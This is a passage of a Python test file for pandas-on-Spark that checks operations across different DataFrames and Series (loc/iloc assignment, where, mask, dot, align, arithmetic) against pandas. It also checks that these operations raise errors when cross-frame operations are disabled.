pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
psser.loc[psser_another % 2 == 1] = -psser
pser.loc[pser_another % 2 == 1] = -pser
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
psser.loc[psser_another % 2 == 1] = -psser_another
pser.loc[pser_another % 2 == 1] = -pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
psser.loc[["viper", "sidewinder"]] = -psser_another
pser.loc[["viper", "sidewinder"]] = -pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
psser.loc[psser_another % 2 == 1] = 10
pser.loc[pser_another % 2 == 1] = 10
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
    def test_series_iloc_setitem(self):
        """``Series.iloc`` setitem with a value series anchored to a different frame.

        Also exercises assignment through a derived series (``psser1``) and
        through a saved ``.iloc`` indexer object (``kiloc`` — legacy "koalas"
        naming kept for byte-compatibility with the original test).
        """
        pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
        psdf = ps.from_pandas(pdf)
        pser = pdf.x
        psery = pdf.y
        psser = psdf.x
        pssery = psdf.y
        # Derived series: assignments to these must not touch pdf/psdf.
        pser1 = pser + 1
        psser1 = psser + 1
        pser_another = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
        psser_another = ps.from_pandas(pser_another)
        # Full-length positional assignment from another anchor.
        psser.iloc[[0, 1, 2]] = -psser_another
        pser.iloc[[0, 1, 2]] = -pser_another
        self.assert_eq(psser, pser)
        self.assert_eq(psdf, pdf)
        self.assert_eq(pssery, psery)
        # Length mismatch between indexer and value is rejected.
        with self.assertRaisesRegex(
            ValueError,
            "cannot set using a list-like indexer with a different length than the value",
        ):
            psser.iloc[[1, 2]] = -psser_another
        psser.iloc[[0, 1, 2]] = 10 * psser_another
        pser.iloc[[0, 1, 2]] = 10 * pser_another
        self.assert_eq(psser, pser)
        self.assert_eq(psdf, pdf)
        self.assert_eq(pssery, psery)
        with self.assertRaisesRegex(
            ValueError,
            "cannot set using a list-like indexer with a different length than the value",
        ):
            psser.iloc[[0]] = 10 * psser_another
        # Same checks through the derived series; parent frame must be unchanged.
        psser1.iloc[[0, 1, 2]] = -psser_another
        pser1.iloc[[0, 1, 2]] = -pser_another
        self.assert_eq(psser1, pser1)
        self.assert_eq(psdf, pdf)
        self.assert_eq(pssery, psery)
        with self.assertRaisesRegex(
            ValueError,
            "cannot set using a list-like indexer with a different length than the value",
        ):
            psser1.iloc[[1, 2]] = -psser_another
        # Same checks through a saved .iloc indexer object.
        pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
        psdf = ps.from_pandas(pdf)
        pser = pdf.x
        psery = pdf.y
        psser = psdf.x
        pssery = psdf.y
        piloc = pser.iloc
        kiloc = psser.iloc
        kiloc[[0, 1, 2]] = -psser_another
        piloc[[0, 1, 2]] = -pser_another
        self.assert_eq(psser, pser)
        self.assert_eq(psdf, pdf)
        self.assert_eq(pssery, psery)
        with self.assertRaisesRegex(
            ValueError,
            "cannot set using a list-like indexer with a different length than the value",
        ):
            kiloc[[1, 2]] = -psser_another
        kiloc[[0, 1, 2]] = 10 * psser_another
        piloc[[0, 1, 2]] = 10 * pser_another
        self.assert_eq(psser, pser)
        self.assert_eq(psdf, pdf)
        self.assert_eq(pssery, psery)
        with self.assertRaisesRegex(
            ValueError,
            "cannot set using a list-like indexer with a different length than the value",
        ):
            kiloc[[0]] = 10 * psser_another
def test_update(self):
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [10, 20, 30]})
psdf = ps.from_pandas(pdf)
pser = pdf.x
psser = psdf.x
pser.update(pd.Series([4, 5, 6]))
psser.update(ps.Series([4, 5, 6]))
self.assert_eq(psser.sort_index(), pser.sort_index())
self.assert_eq(psdf.sort_index(), pdf.sort_index())
def test_where(self):
pdf1 = pd.DataFrame({"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]})
pdf2 = pd.DataFrame({"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]})
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1.where(pdf2 > 100), psdf1.where(psdf2 > 100).sort_index())
pdf1 = pd.DataFrame({"A": [-1, -2, -3, -4, -5], "B": [-100, -200, -300, -400, -500]})
pdf2 = pd.DataFrame({"A": [-10, -20, -30, -40, -50], "B": [-5, -4, -3, -2, -1]})
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1.where(pdf2 < -250), psdf1.where(psdf2 < -250).sort_index())
# multi-index columns
pdf1 = pd.DataFrame({("X", "A"): [0, 1, 2, 3, 4], ("X", "B"): [100, 200, 300, 400, 500]})
pdf2 = pd.DataFrame(
{("X", "A"): [0, -1, -2, -3, -4], ("X", "B"): [-100, -200, -300, -400, -500]}
)
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1.where(pdf2 > 100), psdf1.where(psdf2 > 100).sort_index())
def test_mask(self):
pdf1 = pd.DataFrame({"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]})
pdf2 = pd.DataFrame({"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]})
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1.mask(pdf2 < 100), psdf1.mask(psdf2 < 100).sort_index())
pdf1 = pd.DataFrame({"A": [-1, -2, -3, -4, -5], "B": [-100, -200, -300, -400, -500]})
pdf2 = pd.DataFrame({"A": [-10, -20, -30, -40, -50], "B": [-5, -4, -3, -2, -1]})
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1.mask(pdf2 > -250), psdf1.mask(psdf2 > -250).sort_index())
# multi-index columns
pdf1 = pd.DataFrame({("X", "A"): [0, 1, 2, 3, 4], ("X", "B"): [100, 200, 300, 400, 500]})
pdf2 = pd.DataFrame(
{("X", "A"): [0, -1, -2, -3, -4], ("X", "B"): [-100, -200, -300, -400, -500]}
)
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1.mask(pdf2 < 100), psdf1.mask(psdf2 < 100).sort_index())
    def test_multi_index_column_assignment_frame(self):
        """Column assignment into a frame with 2-level MultiIndex columns.

        Exercises scalar labels, tuple labels, values whose names are strings
        or tuples of various lengths, and frame-valued assignment; finally a
        3-tuple key must be rejected because the column index depth is 2.
        """
        pdf = pd.DataFrame({"a": [1, 2, 3, 2], "b": [4.0, 2.0, 3.0, 1.0]})
        pdf.columns = pd.MultiIndex.from_tuples([("a", "x"), ("a", "y")])
        psdf = ps.DataFrame(pdf)
        # Plain string key on a 2-level column index.
        psdf["c"] = ps.Series([10, 20, 30, 20])
        pdf["c"] = pd.Series([10, 20, 30, 20])
        # Tuple key; the value's name ("1") is ignored in favor of the key.
        psdf[("d", "x")] = ps.Series([100, 200, 300, 200], name="1")
        pdf[("d", "x")] = pd.Series([100, 200, 300, 200], name="1")
        # Tuple key with a tuple-named value.
        psdf[("d", "y")] = ps.Series([1000, 2000, 3000, 2000], name=("1", "2"))
        pdf[("d", "y")] = pd.Series([1000, 2000, 3000, 2000], name=("1", "2"))
        # String key with a 3-tuple-named value.
        psdf["e"] = ps.Series([10000, 20000, 30000, 20000], name=("1", "2", "3"))
        pdf["e"] = pd.Series([10000, 20000, 30000, 20000], name=("1", "2", "3"))
        # Frame-valued assignment into two tuple keys at once.
        psdf[[("f", "x"), ("f", "y")]] = ps.DataFrame(
            {"1": [100000, 200000, 300000, 200000], "2": [1000000, 2000000, 3000000, 2000000]}
        )
        pdf[[("f", "x"), ("f", "y")]] = pd.DataFrame(
            {"1": [100000, 200000, 300000, 200000], "2": [1000000, 2000000, 3000000, 2000000]}
        )
        self.assert_eq(repr(psdf.sort_index()), repr(pdf))
        # A key deeper than the column index depth must fail.
        with self.assertRaisesRegex(KeyError, "Key length \\(3\\) exceeds index depth \\(2\\)"):
            psdf[("1", "2", "3")] = ps.Series([100, 200, 300, 200])
    def test_series_dot(self):
        """``Series.dot`` against series and frames anchored to different objects."""
        pser = pd.Series([90, 91, 85], index=[2, 4, 1])
        psser = ps.from_pandas(pser)
        pser_other = pd.Series([90, 91, 85], index=[2, 4, 1])
        psser_other = ps.from_pandas(pser_other)
        self.assert_eq(psser.dot(psser_other), pser.dot(pser_other))
        # Same values, differently ordered index — dot aligns on index.
        psser_other = ps.Series([90, 91, 85], index=[1, 2, 4])
        pser_other = pd.Series([90, 91, 85], index=[1, 2, 4])
        self.assert_eq(psser.dot(psser_other), pser.dot(pser_other))
        # length of index is different
        psser_other = ps.Series([90, 91, 85, 100], index=[2, 4, 1, 0])
        with self.assertRaisesRegex(ValueError, "matrices are not aligned"):
            psser.dot(psser_other)
        # for MultiIndex
        midx = pd.MultiIndex(
            [["lama", "cow", "falcon"], ["speed", "weight", "length"]],
            [[0, 0, 0, 1, 1, 1, 2, 2, 2], [0, 1, 2, 0, 1, 2, 0, 1, 2]],
        )
        pser = pd.Series([45, 200, 1.2, 30, 250, 1.5, 320, 1, 0.3], index=midx)
        psser = ps.from_pandas(pser)
        pser_other = pd.Series([-450, 20, 12, -30, -250, 15, -320, 100, 3], index=midx)
        psser_other = ps.from_pandas(pser_other)
        self.assert_eq(psser.dot(psser_other), pser.dot(pser_other))
        pser = pd.Series([0, 1, 2, 3])
        psser = ps.from_pandas(pser)
        # DataFrame "other" without Index/MultiIndex as columns
        pdf = pd.DataFrame([[0, 1], [-2, 3], [4, -5], [6, 7]])
        psdf = ps.from_pandas(pdf)
        self.assert_eq(psser.dot(psdf), pser.dot(pdf))
        # DataFrame "other" with Index as columns
        pdf.columns = pd.Index(["x", "y"])
        psdf = ps.from_pandas(pdf)
        self.assert_eq(psser.dot(psdf), pser.dot(pdf))
        # Named column index should be preserved through dot.
        pdf.columns = pd.Index(["x", "y"], name="cols_name")
        psdf = ps.from_pandas(pdf)
        self.assert_eq(psser.dot(psdf), pser.dot(pdf))
        # Row order of the frame must not matter (index alignment).
        pdf = pdf.reindex([1, 0, 2, 3])
        psdf = ps.from_pandas(pdf)
        self.assert_eq(psser.dot(psdf), pser.dot(pdf))
        # DataFrame "other" with MultiIndex as columns
        pdf.columns = pd.MultiIndex.from_tuples([("a", "x"), ("b", "y")])
        psdf = ps.from_pandas(pdf)
        self.assert_eq(psser.dot(psdf), pser.dot(pdf))
        pdf.columns = pd.MultiIndex.from_tuples(
            [("a", "x"), ("b", "y")], names=["cols_name1", "cols_name2"]
        )
        psdf = ps.from_pandas(pdf)
        self.assert_eq(psser.dot(psdf), pser.dot(pdf))
        # Series and frame created independently on the pandas-on-Spark side.
        psser = ps.DataFrame({"a": [1, 2, 3], "b": [4, 5, 6]}).b
        pser = psser.to_pandas()
        psdf = ps.DataFrame({"c": [7, 8, 9]})
        pdf = psdf.to_pandas()
        self.assert_eq(psser.dot(psdf), pser.dot(pdf))
    def test_frame_dot(self):
        """``DataFrame.dot`` with a series anchored to a different object."""
        pdf = pd.DataFrame([[0, 1, -2, -1], [1, 1, 1, 1]])
        psdf = ps.from_pandas(pdf)
        pser = pd.Series([1, 1, 2, 1])
        psser = ps.from_pandas(pser)
        self.assert_eq(psdf.dot(psser), pdf.dot(pser))
        # Index reorder
        pser = pser.reindex([1, 0, 2, 3])
        psser = ps.from_pandas(pser)
        self.assert_eq(psdf.dot(psser), pdf.dot(pser))
        # ser with name
        pser.name = "ser"
        psser = ps.from_pandas(pser)
        self.assert_eq(psdf.dot(psser), pdf.dot(pser))
        # df with MultiIndex as column (ser with MultiIndex)
        arrays = [[1, 1, 2, 2], ["red", "blue", "red", "blue"]]
        pidx = pd.MultiIndex.from_arrays(arrays, names=("number", "color"))
        pser = pd.Series([1, 1, 2, 1], index=pidx)
        pdf = pd.DataFrame([[0, 1, -2, -1], [1, 1, 1, 1]], columns=pidx)
        psdf = ps.from_pandas(pdf)
        psser = ps.from_pandas(pser)
        self.assert_eq(psdf.dot(psser), pdf.dot(pser))
        # df with Index as column (ser with Index)
        pidx = pd.Index([1, 2, 3, 4], name="number")
        pser = pd.Series([1, 1, 2, 1], index=pidx)
        pdf = pd.DataFrame([[0, 1, -2, -1], [1, 1, 1, 1]], columns=pidx)
        psdf = ps.from_pandas(pdf)
        psser = ps.from_pandas(pser)
        self.assert_eq(psdf.dot(psser), pdf.dot(pser))
        # df with Index
        pdf.index = pd.Index(["x", "y"], name="char")
        psdf = ps.from_pandas(pdf)
        self.assert_eq(psdf.dot(psser), pdf.dot(pser))
        # df with MultiIndex
        pdf.index = pd.MultiIndex.from_arrays([[1, 1], ["red", "blue"]], names=("number", "color"))
        psdf = ps.from_pandas(pdf)
        self.assert_eq(psdf.dot(psser), pdf.dot(pser))
        # dot with a column of (a derived expression on) the same frame.
        pdf = pd.DataFrame([[1, 2], [3, 4]])
        psdf = ps.from_pandas(pdf)
        self.assert_eq(psdf.dot(psdf[0]), pdf.dot(pdf[0]))
        self.assert_eq(psdf.dot(psdf[0] * 10), pdf.dot(pdf[0] * 10))
        self.assert_eq((psdf + 1).dot(psdf[0] * 10), (pdf + 1).dot(pdf[0] * 10))
def test_to_series_comparison(self):
psidx1 = ps.Index([1, 2, 3, 4, 5])
psidx2 = ps.Index([1, 2, 3, 4, 5])
self.assert_eq((psidx1.to_series() == psidx2.to_series()).all(), True)
psidx1.name = "koalas"
psidx2.name = "koalas"
self.assert_eq((psidx1.to_series() == psidx2.to_series()).all(), True)
def test_series_repeat(self):
pser1 = pd.Series(["a", "b", "c"], name="a")
pser2 = pd.Series([10, 20, 30], name="rep")
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
self.assert_eq(psser1.repeat(psser2).sort_index(), pser1.repeat(pser2).sort_index())
    def test_series_ops(self):
        """Arithmetic mixing two series and an index, named and unnamed variants."""
        pser1 = pd.Series([1, 2, 3, 4, 5, 6, 7], name="x", index=[11, 12, 13, 14, 15, 16, 17])
        pser2 = pd.Series([1, 2, 3, 4, 5, 6, 7], name="x", index=[11, 12, 13, 14, 15, 16, 17])
        pidx1 = pd.Index([10, 11, 12, 13, 14, 15, 16], name="x")
        psser1 = ps.from_pandas(pser1)
        psser2 = ps.from_pandas(pser2)
        psidx1 = ps.from_pandas(pidx1)
        # series op series — all four combinations of named/unnamed operands.
        self.assert_eq(
            (psser1 + 1 + 10 * psser2).sort_index(), (pser1 + 1 + 10 * pser2).sort_index()
        )
        self.assert_eq(
            (psser1 + 1 + 10 * psser2.rename()).sort_index(),
            (pser1 + 1 + 10 * pser2.rename()).sort_index(),
        )
        self.assert_eq(
            (psser1.rename() + 1 + 10 * psser2).sort_index(),
            (pser1.rename() + 1 + 10 * pser2).sort_index(),
        )
        self.assert_eq(
            (psser1.rename() + 1 + 10 * psser2.rename()).sort_index(),
            (pser1.rename() + 1 + 10 * pser2.rename()).sort_index(),
        )
        # series op index — same naming combinations.
        self.assert_eq(psser1 + 1 + 10 * psidx1, pser1 + 1 + 10 * pidx1)
        self.assert_eq(psser1.rename() + 1 + 10 * psidx1, pser1.rename() + 1 + 10 * pidx1)
        self.assert_eq(psser1 + 1 + 10 * psidx1.rename(None), pser1 + 1 + 10 * pidx1.rename(None))
        self.assert_eq(
            psser1.rename() + 1 + 10 * psidx1.rename(None),
            pser1.rename() + 1 + 10 * pidx1.rename(None),
        )
        # index op series — same naming combinations, operands swapped.
        self.assert_eq(psidx1 + 1 + 10 * psser1, pidx1 + 1 + 10 * pser1)
        self.assert_eq(psidx1 + 1 + 10 * psser1.rename(), pidx1 + 1 + 10 * pser1.rename())
        self.assert_eq(psidx1.rename(None) + 1 + 10 * psser1, pidx1.rename(None) + 1 + 10 * pser1)
        self.assert_eq(
            psidx1.rename(None) + 1 + 10 * psser1.rename(),
            pidx1.rename(None) + 1 + 10 * pser1.rename(),
        )
        # Mismatched lengths between series and index are rejected either way.
        pidx2 = pd.Index([11, 12, 13])
        psidx2 = ps.from_pandas(pidx2)
        with self.assertRaisesRegex(
            ValueError, "operands could not be broadcast together with shapes"
        ):
            psser1 + psidx2
        with self.assertRaisesRegex(
            ValueError, "operands could not be broadcast together with shapes"
        ):
            psidx2 + psser1
    def test_index_ops(self):
        """Arithmetic between two indexes; naming of the result varies by pandas version."""
        pidx1 = pd.Index([1, 2, 3, 4, 5], name="x")
        pidx2 = pd.Index([6, 7, 8, 9, 10], name="x")
        psidx1 = ps.from_pandas(pidx1)
        psidx2 = ps.from_pandas(pidx2)
        self.assert_eq(psidx1 * 10 + psidx2, pidx1 * 10 + pidx2)
        self.assert_eq(psidx1.rename(None) * 10 + psidx2, pidx1.rename(None) * 10 + pidx2)
        # pandas < 1.0 drops the result name when only one operand is named,
        # so the expected value is adjusted per version.
        if LooseVersion(pd.__version__) >= LooseVersion("1.0"):
            self.assert_eq(psidx1 * 10 + psidx2.rename(None), pidx1 * 10 + pidx2.rename(None))
        else:
            self.assert_eq(
                psidx1 * 10 + psidx2.rename(None), (pidx1 * 10 + pidx2.rename(None)).rename(None)
            )
        # Different lengths cannot be combined.
        pidx3 = pd.Index([11, 12, 13])
        psidx3 = ps.from_pandas(pidx3)
        with self.assertRaisesRegex(
            ValueError, "operands could not be broadcast together with shapes"
        ):
            psidx1 + psidx3
        # Conflicting names: result naming again differs across pandas versions.
        pidx1 = pd.Index([1, 2, 3, 4, 5], name="a")
        pidx2 = pd.Index([6, 7, 8, 9, 10], name="a")
        pidx3 = pd.Index([11, 12, 13, 14, 15], name="x")
        psidx1 = ps.from_pandas(pidx1)
        psidx2 = ps.from_pandas(pidx2)
        psidx3 = ps.from_pandas(pidx3)
        self.assert_eq(psidx1 * 10 + psidx2, pidx1 * 10 + pidx2)
        if LooseVersion(pd.__version__) >= LooseVersion("1.0"):
            self.assert_eq(psidx1 * 10 + psidx3, pidx1 * 10 + pidx3)
        else:
            self.assert_eq(psidx1 * 10 + psidx3, (pidx1 * 10 + pidx3).rename(None))
    def test_align(self):
        """``align`` across frames and series with partially overlapping indexes.

        Covers frame/frame, series/series, frame/series and series/frame for
        every join type, for both plain and multi-index columns, plus the
        axis restrictions when the column sets differ.
        """
        pdf1 = pd.DataFrame({"a": [1, 2, 3], "b": ["a", "b", "c"]}, index=[10, 20, 30])
        pdf2 = pd.DataFrame({"a": [4, 5, 6], "c": ["d", "e", "f"]}, index=[10, 11, 12])
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        for join in ["outer", "inner", "left", "right"]:
            for axis in [None, 0]:
                psdf_l, psdf_r = psdf1.align(psdf2, join=join, axis=axis)
                pdf_l, pdf_r = pdf1.align(pdf2, join=join, axis=axis)
                self.assert_eq(psdf_l.sort_index(), pdf_l.sort_index())
                self.assert_eq(psdf_r.sort_index(), pdf_r.sort_index())
        pser1 = pd.Series([7, 8, 9], index=[10, 11, 12])
        pser2 = pd.Series(["g", "h", "i"], index=[10, 20, 30])
        psser1 = ps.from_pandas(pser1)
        psser2 = ps.from_pandas(pser2)
        for join in ["outer", "inner", "left", "right"]:
            psser_l, psser_r = psser1.align(psser2, join=join)
            pser_l, pser_r = pser1.align(pser2, join=join)
            self.assert_eq(psser_l.sort_index(), pser_l.sort_index())
            self.assert_eq(psser_r.sort_index(), pser_r.sort_index())
            psdf_l, psser_r = psdf1.align(psser1, join=join, axis=0)
            pdf_l, pser_r = pdf1.align(pser1, join=join, axis=0)
            self.assert_eq(psdf_l.sort_index(), pdf_l.sort_index())
            self.assert_eq(psser_r.sort_index(), pser_r.sort_index())
            psser_l, psdf_r = psser1.align(psdf1, join=join)
            pser_l, pdf_r = pser1.align(pdf1, join=join)
            self.assert_eq(psser_l.sort_index(), pser_l.sort_index())
            self.assert_eq(psdf_r.sort_index(), pdf_r.sort_index())
        # multi-index columns
        pdf3 = pd.DataFrame(
            {("x", "a"): [4, 5, 6], ("y", "c"): ["d", "e", "f"]}, index=[10, 11, 12]
        )
        psdf3 = ps.from_pandas(pdf3)
        pser3 = pdf3[("y", "c")]
        psser3 = psdf3[("y", "c")]
        for join in ["outer", "inner", "left", "right"]:
            psdf_l, psdf_r = psdf1.align(psdf3, join=join, axis=0)
            pdf_l, pdf_r = pdf1.align(pdf3, join=join, axis=0)
            self.assert_eq(psdf_l.sort_index(), pdf_l.sort_index())
            self.assert_eq(psdf_r.sort_index(), pdf_r.sort_index())
            psser_l, psser_r = psser1.align(psser3, join=join)
            pser_l, pser_r = pser1.align(pser3, join=join)
            self.assert_eq(psser_l.sort_index(), pser_l.sort_index())
            self.assert_eq(psser_r.sort_index(), pser_r.sort_index())
            psdf_l, psser_r = psdf1.align(psser3, join=join, axis=0)
            pdf_l, pser_r = pdf1.align(pser3, join=join, axis=0)
            self.assert_eq(psdf_l.sort_index(), pdf_l.sort_index())
            self.assert_eq(psser_r.sort_index(), pser_r.sort_index())
            psser_l, psdf_r = psser3.align(psdf1, join=join)
            pser_l, pdf_r = pser3.align(pdf1, join=join)
            self.assert_eq(psser_l.sort_index(), pser_l.sort_index())
            self.assert_eq(psdf_r.sort_index(), pdf_r.sort_index())
        # Aligning frames whose column levels differ is rejected for these axes.
        self.assertRaises(ValueError, lambda: psdf1.align(psdf3, axis=None))
        self.assertRaises(ValueError, lambda: psdf1.align(psdf3, axis=1))
def test_pow_and_rpow(self):
pser = pd.Series([1, 2, np.nan])
psser = ps.from_pandas(pser)
pser_other = pd.Series([np.nan, 2, 3])
psser_other = ps.from_pandas(pser_other)
self.assert_eq(pser.pow(pser_other), psser.pow(psser_other).sort_index())
self.assert_eq(pser ** pser_other, (psser ** psser_other).sort_index())
self.assert_eq(pser.rpow(pser_other), psser.rpow(psser_other).sort_index())
    def test_shift(self):
        """``shift`` combined with a boolean ``.loc`` filter built from the same data."""
        pdf = pd.DataFrame(
            {
                "Col1": [10, 20, 15, 30, 45],
                "Col2": [13, 23, 18, 33, 48],
                "Col3": [17, 27, 22, 37, 52],
            },
            index=np.random.rand(5),
        )
        psdf = ps.from_pandas(pdf)
        # astype(int) on the pandas side: shift() upcasts to float there,
        # while the pandas-on-Spark result stays integral.
        self.assert_eq(
            pdf.shift().loc[pdf["Col1"] == 20].astype(int), psdf.shift().loc[psdf["Col1"] == 20]
        )
        self.assert_eq(
            pdf["Col2"].shift().loc[pdf["Col1"] == 20].astype(int),
            psdf["Col2"].shift().loc[psdf["Col1"] == 20],
        )
    def test_diff(self):
        """``diff`` combined with a boolean ``.loc`` filter built from the same data."""
        pdf = pd.DataFrame(
            {
                "Col1": [10, 20, 15, 30, 45],
                "Col2": [13, 23, 18, 33, 48],
                "Col3": [17, 27, 22, 37, 52],
            },
            index=np.random.rand(5),
        )
        psdf = ps.from_pandas(pdf)
        # astype(int) on the pandas side: diff() upcasts to float there,
        # while the pandas-on-Spark result stays integral.
        self.assert_eq(
            pdf.diff().loc[pdf["Col1"] == 20].astype(int), psdf.diff().loc[psdf["Col1"] == 20]
        )
        self.assert_eq(
            pdf["Col2"].diff().loc[pdf["Col1"] == 20].astype(int),
            psdf["Col2"].diff().loc[psdf["Col1"] == 20],
        )
def test_rank(self):
pdf = pd.DataFrame(
{
"Col1": [10, 20, 15, 30, 45],
"Col2": [13, 23, 18, 33, 48],
"Col3": [17, 27, 22, 37, 52],
},
index=np.random.rand(5),
)
psdf = ps.from_pandas(pdf)
self.assert_eq(pdf.rank().loc[pdf["Col1"] == 20], psdf.rank().loc[psdf["Col1"] == 20])
self.assert_eq(
pdf["Col2"].rank().loc[pdf["Col1"] == 20], psdf["Col2"].rank().loc[psdf["Col1"] == 20]
)
class OpsOnDiffFramesDisabledTest(PandasOnSparkTestCase, SQLTestUtils):
    """Counterpart suite: with ``compute.ops_on_diff_frames`` disabled, every
    operation that combines objects anchored to different frames must raise
    ``ValueError("Cannot combine the series or dataframe ...")``.
    """

    @classmethod
    def setUpClass(cls):
        # Disable cross-frame operations for the whole class.
        super().setUpClass()
        set_option("compute.ops_on_diff_frames", False)

    @classmethod
    def tearDownClass(cls):
        # Restore the option so other suites are unaffected.
        reset_option("compute.ops_on_diff_frames")
        super().tearDownClass()

    @property
    def pdf1(self):
        """pandas fixture with a non-monotonic, duplicated index."""
        return pd.DataFrame(
            {"a": [1, 2, 3, 4, 5, 6, 7, 8, 9], "b": [4, 5, 6, 3, 2, 1, 0, 0, 0]},
            index=[0, 1, 3, 5, 6, 8, 9, 9, 9],
        )

    @property
    def pdf2(self):
        """pandas fixture with a plain 0..8 index."""
        return pd.DataFrame(
            {"a": [9, 8, 7, 6, 5, 4, 3, 2, 1], "b": [0, 0, 0, 4, 5, 6, 1, 2, 3]},
            index=list(range(9)),
        )

    @property
    def psdf1(self):
        # Fresh pandas-on-Spark frame per access: a distinct anchor each time.
        return ps.from_pandas(self.pdf1)

    @property
    def psdf2(self):
        return ps.from_pandas(self.pdf2)

    def test_arithmetic(self):
        """Any arithmetic across two anchors is rejected."""
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            self.psdf1.a - self.psdf2.b
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            self.psdf1.a - self.psdf2.a
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            self.psdf1["a"] - self.psdf2["a"]
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            self.psdf1 - self.psdf2

    def test_assignment(self):
        """Column assignment from a different anchor is rejected.

        Note: ``self.psdf1`` is a property returning a new frame each access,
        so it is a different anchor from the local ``psdf``.
        """
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf = ps.from_pandas(self.pdf1)
            psdf["c"] = self.psdf1.a

    def test_frame_loc_setitem(self):
        """``.loc`` setitem involving another anchor is rejected."""
        pdf = pd.DataFrame(
            [[1, 2], [4, 5], [7, 8]],
            index=["cobra", "viper", "sidewinder"],
            columns=["max_speed", "shield"],
        )
        psdf = ps.DataFrame(pdf)
        another_psdf = ps.DataFrame(pdf)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf.loc[["viper", "sidewinder"], ["shield"]] = another_psdf.max_speed
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf.loc[another_psdf.max_speed < 5, ["shield"]] = -psdf.max_speed
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf.loc[another_psdf.max_speed < 5, ["shield"]] = -another_psdf.max_speed

    def test_frame_iloc_setitem(self):
        """``.iloc`` setitem involving another anchor is rejected."""
        pdf = pd.DataFrame(
            [[1, 2], [4, 5], [7, 8]],
            index=["cobra", "viper", "sidewinder"],
            columns=["max_speed", "shield"],
        )
        psdf = ps.DataFrame(pdf)
        another_psdf = ps.DataFrame(pdf)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf.iloc[[1, 2], [1]] = another_psdf.max_speed.iloc[[1, 2]]

    def test_series_loc_setitem(self):
        """``Series.loc`` setitem involving another anchor is rejected."""
        pser = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
        psser = ps.from_pandas(pser)
        pser_another = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
        psser_another = ps.from_pandas(pser_another)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psser.loc[psser % 2 == 1] = -psser_another
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psser.loc[psser_another % 2 == 1] = -psser
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psser.loc[psser_another % 2 == 1] = -psser_another

    def test_series_iloc_setitem(self):
        """``Series.iloc`` setitem involving another anchor is rejected."""
        pser = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
        psser = ps.from_pandas(pser)
        pser_another = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
        psser_another = ps.from_pandas(pser_another)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psser.iloc[[1]] = -psser_another.iloc[[1]]

    def test_where(self):
        """``where`` with a condition from another anchor is rejected."""
        pdf1 = pd.DataFrame({"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]})
        pdf2 = pd.DataFrame({"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]})
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf1.where(psdf2 > 100)
